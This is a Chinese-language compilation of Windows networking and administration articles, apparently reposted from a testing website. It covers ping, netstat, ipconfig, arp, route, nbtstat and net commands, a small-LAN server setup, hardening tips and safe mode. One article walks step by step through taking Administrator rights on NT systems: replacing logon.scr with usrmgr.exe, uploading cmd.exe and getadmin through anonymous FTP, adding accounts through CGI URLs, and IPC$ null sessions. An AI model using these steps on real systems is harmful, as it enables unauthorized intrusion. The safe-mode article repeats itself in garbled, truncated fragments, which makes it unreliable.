ping 局域网内其他IP--这个命令应该离开你的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。

ping 网关IP--这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。

ping 远程IP--如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。

ping localhost--localhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。

ping www.yahoo.com--对这个域名执行Pin ... 地址，通常是通过DNS 服务器如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：你也可以利用该命令实现域名对IP地址的转换功能。

Ping命令的常用参数选项

ping IP -t--连续对IP地址执行Ping命令，直到被用户以Ctrl+C中断。

ping IP -l --指定Ping命令中的数据长度为2000字节，而不是缺省的32字节。

ping IP -n--执行特定次数的Ping命令。

Netstat ??Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据，一般用于检验本机各端口的网络连接情况。

netstat 的一些常用选项：

netstat -s--本选项能够按照各个协议分别显示其统计数据。如果你的应用程序（如Web浏览器）运行速度比较慢，或者不能显示Web页之类的数据，那么你就可以用本选项来查看一下所显示的信息。你需要仔细查看统计数据的各行，找到出错的关键字，进而确定问题所在。

netstat -e--本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量，也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量）。

netstat -r--本选项可以显示关于路由表的信息，类似于后面所讲使用route print命令时看到的信息。除了显示有效路由外，还显示当前有效的连接。

netstat -a--本选项显示一个所有的有效连接信息列表，包括已建立的连接（ESTABLISHED），也包括监听连接请求（LISTENING）的那些连接。

netstat -n--显示所有已建立的有效连接。

Netstat的妙用

IPConfig

??IPConfig实用程序和它的等价图形用户界面――Windows 95/98中的WinIPCfg可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。但是，如果你的计算机和所在的局域网使用了动态主机配置协议（Dynamic Host Configuration Protocol，DHCP--Windows NT下的一种把较少的IP地址分配给较多主机使用的协议，类似于拨号上网的动态IP分配），这个程序所显示的信息也许更加实用。这时，IPConfig可以让你了解你的计算机是否成功的租用到一个IP地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。

最常用的选项：

ipconfig--当使用IPConfig时不带任何参数选项，那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值

ipconfig /all--当使用all选项时，IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址（MAC），

如果IP地址是从DHCP服务器租用的，IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期（有关DHCP服务器的相关内容请详见其他有关NT服务器的书籍或询问你的网管），其输出信息见图6的下半部分。

ipconfig /release和ipconfig /renew--这是两个附加选项，只能在向DHCP服务器租用其IP地址的计算机上起作用。如果你输入ipconfig /release，那么所有接口的租用IP地址便重新交付给DHCP服务器（归还IP地址）。如果你输入ipconfig /renew，那么本地计算机便设法与DHCP服务器取得联系，并租用一个IP地址。请注意，大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。

ARP（地址转换协议）

常用命令选项：

arp -a或arp -g--用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的，多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项，而Windows用的是arp -a（-a可被视为all，即全部的意思），但它也可以接受比较传统的-g选项。

arp -a IP--如果你有多个网卡，那么使用arp -a加上接口的IP地址，就可以只显示与该接口相关的ARP缓存项目。

arp -d IP--使用本命令能够人工删除一个静态项目。

Tracert

Route

一般使用选项：

route print--本命令用于显示路由表中的当前项目，在单路由器网段上的输出结果如图12，由于用IP地址配置了网卡，因此所有的这些项目都是自动添加的。

route add--使用本命令，可以将信路由项目添加给路由表。例如，如果要设定一个到目的网络209.98.32.33的路由，其间要经过5个路由器网段，首先要经过本地网络上的一个路由器，器IP为202.96.123.5，子网掩码为255.255.255.224，那么你应该输入以下命令：

route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5

route change--你可以使用本命令来修改数据的传输路由，不过，你不能使用本命令来改变数据的目的地。下面这个例子可以将数据的路由改到另一个路由器，它采用一条包含3个网段的更直的路径：

route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3

route delete--使用本命令可以从路由表中删除路由。例如：route delete 209.98.32.33

NBTStat

??NBTStat（TCP/IP上的NetBIOS统计数据）实用程序用于提供关于关于NetBIOS的统计数据。运用NetBIOS，你可以查看本地计算机或远程计算机上的NetBIOS名字表格。

常用选项：

nbtstat -n--显示寄存在本地的名字和服务程序

nbtstat -c--本命令用于显示NetBIOS名字高速缓存的内容。NetBIOS名字高速缓存用于寸放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。

nbtstat -r--本命令用于清除和重新加载NetBIOS名字高速缓存。

nbtstat -a IP--通过IP显示另一台计算机的物理地址和名字列表，你所显示的内容就像对方计算机自己运行nbtstat -n一样

nbtstat -s IP--显示实用其IP地址的另一台计算机的NetBIOS连接表。

Net

??Net命令有很多函数用于实用和核查计算机之间的NetBIOS连接。这里我只介绍最常用的两个：net view和net use。

net view UNC--运用此命令，你可以查看目标服务器上的共享点名字。任何局域网里的人都可以发出此命令，而且不需要提供用户ID或口令。UNC名字总是以\开头，后面跟随目标计算机的名字。例如，net view \\lx就是查看主机名为lx的计算机的共享点（见图15）。

net use 本地盘符目标计算机共享点――本命令用于建立或取消到达特定共享点的映像驱动器的连接（如果需要，你必须提供用户ID或口令）。例如，你输入net use f: \lxmp3就是将映像驱动器F:连接到\lxmp3共享点上，今后你直接访问F:就可以访问\lxmp3共享点，这和你右击“我的电脑”选择映射网络驱动器类似。

原文转自：www.ltesting.net

篇6：小型网服务器安装指南Windows系统

一．服务器上Win2000的安装配置 1.Win2000使用典型安装完毕，配置为主域服务器，并配置网卡的ip为192.168.0.1，子网为255.255.255.0，将此网卡连接到服务器所在的网络，使用TCP/IP协议。在现有的网络中，不应该将此功能与其他 Windows 2000 Server 域控

一．服务器上Win2000的安装配置

1.Win2000使用典型安装完毕，配置为主域服务器。并配置网卡的ip为192.168.0.1，子网为255.255.255.0，将此网卡连接到服务器所在的网络，使用TCP/IP协议。在现有的网络中，不应该将此功能与其他 Windows 2000 Server 域控制器、DNS 服务器、网关、DHCP 服务器，或配置为静态 IP 地址的系统一起使用。

2.添加域名服务系统（DNS）

通过控制面板－>添加删除程序－>网络服务－>域名服务系统（DNS）－>打勾－>确定来添加。

二．服务器上添加连接到 Internet的连接

我目前是通过服务器端modem拨号上网的方式来实现的。要注意的是配置 Internet 连接共享，必须以 Administrators 组的成员来登录服务器。

1.安装modem

通过控制面板－>电话和调制解调器选项－>添加来添加外置modem

2.添加拨号连接

通过控制面板－>网络和拨号连接选项－>新建新连接－>出现网络连接向导

在网络连接向导中选－>单击”下一步“－>选拨号到Internet－>单击”下一步“－>出现Internet连接向导，

在Internet连接向导中－>选手动设置Internet连接或通过局域网连接－>单击”下一步“－>通过电话线和调制解调器连接>单击”下一步“>输入ISP提供的上网电话号码>单击”下一步“－>输入ISP提供的用户名和密码>单击”下一步“－>单击”下一步“－>问是否建立邮件帐号时选否－>单击”下一步“－>完成。

3. 共享Internet的连接

在新建立的拨号连接帐号上点击右键>选属性>共享访问>在”启动此连接的Internet连接共享“打勾>确定。

三、在服务器和客户机器上配置 Internet 连接共享的 Internet 选项

1.打开 Internet Explorer>单击”手工设置 Internet 连接，或者通过局域网 (LAN) 连接“，>单击”下一步“ >”通过局域网 (LAN) 连接“ >单击”下一步“>单击”自动查找代理服务器（推荐）“复选框>单击”下一步“ >单击”否“ >单击”下一步“” >单击“完成”。

2.在“连接”选项卡上，单击“不进行拨号连接”，然后单击“局域网设置”。

3.在“自动配置”中，清除“自动检测设置”和“使用自动配置脚本”复选框。

4.在“代理服务器”中，清除“使用代理服务器”复选框。

四、在客户机上设置网卡配置

配置客户机的网卡为自动获得IP地址，网关为空。

到此配置完毕，重新启动服务器和客户机。服务器上拨号上网，在客户机上登录服务器后，就可以通过服务器的代理实现各种Internent功能了

原文转自：www.ltesting.net

篇7：Administrastor真不安全Windows系统

如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号: 先把c:\winnt\system32下的logon.scr改名为logon.old备份然后把usrmgr.exe改名为logon.scr 然后重新启动 logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而

如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:

先把c:\winnt\system32下的logon.scr改名为logon.old备份

然后把usrmgr.exe改名为logon.scr

然后重新启动

logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器

这时他就有权限把自己加到Administrator组

不要忘记把文件名改回来啊!

之二:

下面的技术适用于不重视NT网络安全的网站,

一些 http的技术也可以供较高级的人员参考

进入NT网络可以采取下面的步骤:

因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点，因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com

Connected to www.xxx.com

ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组，这个帐号我们以后要用来获取Administrator的权限

User (www.xxx.comnone)):anonymous

Password: 输入 guest@ 或者guest

对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domain guest组

在这种情况下我们就可以进NT server的ftp了。

进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功，这时你就有了80%的把握，

现在,开始查找cgi-bin目录(或者scripts目录),进去以后,

把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin

然后输入:www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员

下面可以add user:

www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add

这样就创建了一个叫china用户,密码是news,然后:

www.xxx.com/cgi-bin/getadmin.exe?china

或者

www.xxx.com/scripts/tools/getadmin.exe?china

你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录

之三:

用NT的Netbios技术扫描

nbtstat -a www.xxx.com/

或者

nbtstat -A www.xxx.com/

这样可以得到其域的共享资源名称

net view file://www.xxx.com/

可以获得其机器的共享资源名称,如果有c盘

net use f: file://www.xxx.com/c

可以用f:映射其c盘

net use \\111.111.111.111\ipc$ “quot;”quot; /user:“quot;”quot;

之四:Unix下移植过来的工具:

Windows95"amp;98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:

WinDump95.exe 使用前还要下载这个库 Packet95.exe

WindowsNT用户的版本

WinDump.exe PacketNT.exe

原文转自：www.ltesting.net

篇8：如何让Windows 系统更安全

一、采用NTFS格式来分区NTFS的优势

1. 可为用户分配磁盘限额。所谓磁盘限额就是指对系统的每一位用户都分配一定数量的磁盘空间，并且可以选择在用户超出此磁盘空间的时候，是提出警告还是拒绝他使用更多的磁盘空间。右击NTFS格式分区，在快捷菜单中选择属性命令，点击配额选项卡，选择启用配额管理和拒绝将磁盘空间给超过配额限制的用户两个复选项，然后可以为该卷上的新用户选择默认配额限制和警告等级，这里就不多说了。

2.压缩或加密文件/文件夹。如果选择了NTFS文件系统，那么不需要第三方工具即可实现压缩和加密功能。右击某文件夹，从属性窗口中选择高级选项页，打开图5窗口，可以看到这里有一个压缩或加密属性小节，这就不用多说了吧？直接勾选即可，不过遗憾的是无法同时选择两项，

3.NTFS格式的分区在安全性方面更加有保障。

二、合理管理您的账号

1.停用Guest 帐号在计算机管理的用户里面把guest帐号停用掉，任何时候都不允许guest帐号登陆系统。为了保险起见，最好给 guest 加一个复杂的密码，你可以打开记事本，在里面输入一串包含特殊字符,数字，字母的长字符串，然后把它作为guest帐号的密码拷进去。

2.创建2个管理员用帐号虽然这点看上去和上面这点有些矛盾，但事实上是服从上面的规则的。创建一个一般权限帐号用来收信以及处理一些日常事物，另一个拥有Administrators 权限的帐户只在需要的时候使用。可以让管理员使用 RunAS 命令来执行一些需要特权才能作的一些工作，以方便管理。

3.合理设置密码不要使用简单的数字，字母作为管理员密码例如123456，abc... 密码的设置原则是数字和字母或者符号相结合。

篇9：妙用Windows系统“安全模式”

只要在启动时不停地按F8就能进入安全模式，就会出现选项菜单，再用键盘上的上下光标键进行选择即可进入不同的启动模式（，选项菜单包括了以下几个：

1.安全模式

只使用基本文件和驱动程序。如鼠标(USB串行鼠标除外)、监视器、键盘、硬盘、基本视频、默认系统服务等，但无网络连接。

如果采用安全模式也不能成功启动计算机，则可能需要使用恢复控制台功能来修复系统。

2.带网络连接的安全模式

在普通安全模式的基础上增加了网络连接。但有些网络程序可能无法正常运行，如MSN等，还有很多自启动的应用程序不会自动加载，如防火墙、杀毒软件等。所以在这种模式下一定不要忘记手动加载，否则恶意程序等可能会入侵在你修复电脑的过程中。

3.带命令行提示符的安全模式

只使用基本的文件和驱动程序来启动，在登录之后，屏幕上显示命令提示符，而非Windows图形界面。

说明：在这种模式下，如果你不小心关闭了命令提示符窗口，屏幕会全黑。可按下组合键Ctrl+Alt+Del，调出“任务管理器”，单击“新任务”，再在弹出对话框的“运行”后输入“C:\WINDOWS\explorer.exe”，可马上启动Windows XP的图形界面，与上述三种安全模式下的界面完全相同。如果输入“c:\windows\system32\cmd”也能再次打开命令提示符窗口。事实上，在其它的安全模式甚至正常启动时也可通过这种方法来启动命令提示符窗口。

4.启用启动日志

以普通的安全模式启动，同时将由系统加载(或没有加载)的所有驱动程序和服务记录到一个文本文件中。该文件称为 ntbtlog.txt，它位于 %windir% (默认为c:\windows\)目录中。启动日志对于确定系统启动问题的准确原因很有用。

5.启用VGA模式

利用基本VGA驱动程序启动。当安装了使Windows不能正常启动的新视频卡驱动程序时，这种模式十分有用。事实上，不管以哪种形式的安全模式启动，它总是使用基本的视频驱动程序。因此，在这些模式下，屏幕的分辨率为640×480且不能改动。但可重新安装驱动程序。

6.最后一次正确的配置

使用Windows上一次关闭时所保存的注册表信息和驱动程序来启动。最后一次成功启动以来所作的任何更改将丢失。因此一般只在配置不对(主要是软件配置)的情况下，才使用最后一次正确的配置。但是它不能解决由于驱动程序或文件被损坏或丢失所导致的问题。

7.目录服务恢复模式

这是针对服务器操作系统的，并只用于恢复域控制器上的SYSVOL目录和Active Directory目录服务。

8.调试模式

启动时通过串行电缆将调试信息发送到另一台计算机。

如果正在或已经使用远程安装服务在您的计算机上安装 Windows，则您可以看到与使用远程安装服务还原或恢复系统相关的附加选项。

现实应用

1.笔者过去用的是一款旧显示器，又是初学者，初学者最爱干的是什么，换点墙纸，设一下分辨率也觉得很有成就感，没想到误将分辨率和刷新率调得太高，下次启动时屏幕花屏，害得的重新安装了操作系统才算了事。

现在想起来那时也真的傻瓜可爱，只要将其重启到安全模式(前四种模式都行)下，删除显卡驱动程序，再重启电脑即可，重启(正常启动)时，系统会自动扫描显卡并安装驱动程序，屏幕即可恢复正常显示。

还有些问题也可用这种方法来处理，比如Windows XP会自动识别硬件并安装驱动程序，但有时总是老眼昏花，而且在设备管理器下不会显示出错信息。但就是工作不正常，如上不了网(网卡驱动有错)、屏幕显示不对(显卡驱动有错)等，也可在安全模式重新安装驱动程序。

2.揪出恶意的自启动程序或服务

如果电脑出现一些莫明其妙的错误，比如上不了网，按常规思路又查不出问题，可启动到带网络连接的安全模式下看看，如果在这里能上，则说明是某些自启动程序或服务影响了网络的正常连接，只要在启动时不停地按F8，就会出现选项菜单，再用键盘上的上下光标键进行选择即可进入不同的启动模式。选项菜单包括了以下几个：

1.安全模式

只使用基本文件和驱动程序。如鼠标(USB串行鼠标除外)、监视器、键盘、硬盘、基本视频、默认系统服务等，但无网络连接。

如果采用安全模式也不能成功启动计算机，则可能需要使用恢复控制台功能来修复系统。

2.带网络连接的安全模式

3.带命令行提示符的安全模式

只使用基本的文件和驱动程序来启动，在登录之后，屏幕上显示命令提示符，而非Windows图形界面。

4.启用启动日志

5.启用VGA模式

利用基本VGA驱动程序启动，

当安装了使Windows不能正常启动的新视频卡驱动程序时，这种模式十分有用。事实上，不管以哪种形式的安全模式启动，它总是使用基本的视频驱动程序。因此，在这些模式下，屏幕的分辨率为640×480且不能改动。但可重新安装驱动程序。

6.最后一次正确的配置

7.目录服务恢复模式

这是针对服务器操作系统的，并只用于恢复域控制器上的SYSVOL目录和Active Directory目录服务。

8.调试模式

启动时通过串行电缆将调试信息发送到另一台计算机。

如果正在或已经使用远程安装服务在您的计算机上安装 Windows，则您可以看到与使用远程安装服务还原或恢复系统相关的附加选项。

现实应用

2.揪出恶意的自启动程序或服务

如果电脑出现一些莫明其妙的错误，比如上不了网，按常规思路又查不出问题，可启动到带网络连接的安全模式下看看，如果在这里能上，则说明是某些自启动程序或服务影响了网络的正常连接要进入安全模式，只要在启动时不停地按F8，就会出现选项菜单，再用键盘上的上下光标键进行选择即可进入不同的启动模式。选项菜单包括了以下几个：

1.安全模式

只使用基本文件和驱动程序。如鼠标(USB串行鼠标除外)、监视器、键盘、硬盘、基本视频、默认系统服务等，但无网络连接。

如果采用安全模式也不能成功启动计算机，则可能需要使用恢复控制台功能来修复系统。

2.带网络连接的安全模式

3.带命令行提示符的安全模式

只使用基本的文件和驱动程序来启动，在登录之后，屏幕上显示命令提示符，而非Windows图形界面。

4.启用启动日志

5.启用VGA模式

6.最后一次正确的配置

7.目录服务恢复模式

这是针对服务器操作系统的，并只用于恢复域控制器上的SYSVOL目录和Active Directory目录服务。

8.调试模式

启动时通过串行电缆将调试信息发送到另一台计算机。

如果正在或已经使用远程安装服务在您的计算机上安装 Windows，则您可以看到与使用远程安装服务还原或恢复系统相关的附加选项。

现实应用

2.揪出恶意的自启动程序或服务

如果电脑出现一些莫明其妙的错误，比如上不了网，按常规思路又查不出问题，可启动到带网络连接的安全模式下看看，如果在这里能上，则说明是某些自启动程序或服务影响了网络的正常连接

篇10：Windows系统常用网络命令及使用技巧

本文主要内容 Ping 命令的使用技巧; Netstat 命令的使用技巧; IPConfig 命令的使用技巧; Arp的使用技巧; Tracert、Route 与 NBTStat的使用技巧，我想大家不会忘记Windows是从简单的DOS字符界面发展过来的。虽然我们平时在使用Windows操作系统的时候，主要是对图形界面进行操作，但是DOS命令我们仍然非常有用，下面就让我看来看看这些命令到底有那些作用，同时学习如何使用这些命令的技巧。

一、Ping命令的使用技巧

Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP配置就是正确的，我们必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。简单的说，Ping就是一个测试程序，如果Ping运行正确，我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping也被某些别有用心的人作为DDOS（拒绝服务攻击）的工具，例如许多大型的网站就是被利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，我们应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL（Time To Live存在时间）值，我们可以通过TTL值推算一下数据包已经通过了多少个路由器：源地点TTL起始值（就是比返回TTL略大的一个2的乘方数）-返回时TTL值。例如，返回TTL值为119，那么可以推算数据报离开源地址的TTL起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回TTL值为246，TTL起始值就是256，源地点到目标地点要通过9个路由器网段。

1、通过Ping检测网络故障的典型次序

正常情况下，当我们使用Ping命令来查找问题所在或检验网络运行情况时，我们需要使用许多Ping命令，如果所有都运行正确，我们就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题，

下面就给出一个典型的检测次序及对应的可能故障：

ping 127.0.0.1

这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。

ping 本机IP

这个命令被送到我们计算机所配置的IP地址，我们的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。

ping 局域网内其他IP

这个命令应该离开我们的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。

ping 网关IP

这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。

ping 远程IP

如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。

ping localhost

localhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。

ping www.xxx.com（如www.yesky.com 天极网）

对这个域名执行Ping www.xxx.com 地址，通常是通过DNS 服务器如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：我们也可以利用该命令实现域名对IP地址的转换功能。如果上面所列出的所有Ping命令都能正常运行，那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示我们所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。